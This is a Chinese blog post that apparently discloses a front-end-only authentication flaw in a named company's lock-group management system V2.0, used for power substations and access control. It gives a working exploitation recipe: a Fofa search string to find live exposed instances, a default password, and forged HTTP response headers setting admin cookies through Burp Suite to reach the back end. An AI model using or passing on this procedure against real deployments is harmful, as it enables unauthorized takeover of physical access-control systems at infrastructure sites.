锁群管理系统

月隐柳梢幻玉笙

已于 2022-03-12 12:37:01 修改

阅读量3.5k

点赞数

文章标签：安全

于 2022-02-24 19:06:27 首次发布

本文链接：https://blog.csdn.net/weixin_52525624/article/details/123118583

版权

一：漏洞介绍

江苏易索电子科技股份有限公司是专业从事变电站视频监控系统、无源智能锁群管理系统开发、电力智能辅助监控系统,配电房监控系统,智能门禁系统,生产及销售的高科技企业。江苏易索电子科技股份有限公司锁群管理系统存在逻辑缺陷漏洞，攻击者可利用该漏洞获取敏感信息。

》》》漏洞详情《《《

在登陆处由于只进行了前端验证，造成用户可以伪造前端的返回包内容来绕过登录，进而进入后台接管后台权限。

经过测试发现，可以通杀2.0版本。

二：漏洞利用

步骤一：使用Fofa搜索以下语句并随便打开一个连接地址...尝试若口令登录（admin:123456）

title=="锁群管理系统 V2.0"

步骤二：设置Burpsuite抓取Response数据包并添加如下规则...

步骤三：在登录页面输入用户名admin并随便输入密码，开启代理抓包修改返回数据包如下...

修改之前：
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 25 Nov 2021 09:29:15 GMT
Connection: close
Content-Length: 30

用户名或密码不正确！

修改之后：
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: username=admin; path=/
Set-Cookie: code=admin; path=/
Set-Cookie: power=1; path=/
Set-Cookie: powerName=%e8%b6%85%e7%ba%a7%e7%ae%a1%e7%90%86%e5%91%98; path=/
X-Powered-By: ASP.NET
Date: Thu, 25 Nov 2021 09:29:15 GMT
Connection: close
Content-Length: 30

0

步骤四：放包之后就可以登录到后台界面中...此时操作关闭代理

月隐柳梢幻玉笙

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
锁群管理系统

一：漏洞介绍江苏易索电子科技股份有限公司是专业从事变电站视频监控系统、无源智能锁群管理系统开发、电力智能辅助监控系统,配电房监控系统,智能门禁系统,生产及销售的高科技企业。江苏易索电子科技股份有限公司锁群管理系统存在逻辑缺陷漏洞，攻击者可利用该漏洞获取敏感信息。》》》漏洞详情《《《在登陆处由于只进行了前端验证，造成用户可以伪造前端的返回包内容来绕过登录，进而进入后台接管后台权限。经过测试发现，可以通杀2.0版本。二：漏洞利用步骤一：使用Fofa搜索以下语句并随便打开一个连接地址..
复制链接

扫一扫